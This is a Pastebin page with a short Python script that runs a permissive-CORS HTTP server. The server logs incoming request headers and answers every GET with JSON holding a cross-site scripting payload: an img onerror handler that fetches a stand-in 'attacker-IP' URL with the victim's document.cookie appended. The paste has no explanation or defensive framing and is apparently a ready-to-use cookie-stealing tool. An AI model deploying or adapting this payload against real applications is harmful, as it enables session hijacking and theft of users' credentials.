Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from http.server import HTTPServer, SimpleHTTPRequestHandler
- import sys
- import logging
- import json
- class CORSRequestHandler(SimpleHTTPRequestHandler):
- def end_headers(self):
- self.send_header('Access-Control-Allow-Origin', '*')
- self.send_header('Access-Control-Allow-Methods', '*')
- self.send_header('Access-Control-Allow-Headers', '*')
- self.send_header('Cache-Control', 'no-store, no-cache, must-revalidate')
- return super(CORSRequestHandler, self).end_headers()
- def do_OPTIONS(self):
- self.send_response(200)
- self.end_headers()
- def do_GET(self):
- logging.error(self.headers)
- self.send_response(200)
- self.send_header('Content-type', 'application/json')
- self.end_headers()
- self.wfile.write(json.dumps({
- 'debug': '<img src=x onerror=fetch("http://attacker-IP/?"+document.cookie)>'
- }).encode())
- host = sys.argv[1] if len(sys.argv) > 2 else '0.0.0.0'
- port = int(sys.argv[len(sys.argv)-1]) if len(sys.argv) > 1 else 8000
- print("Listening on {}:{}".format(host, port))
- httpd = HTTPServer((host, port), CORSRequestHandler)
- httpd.serve_forever()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
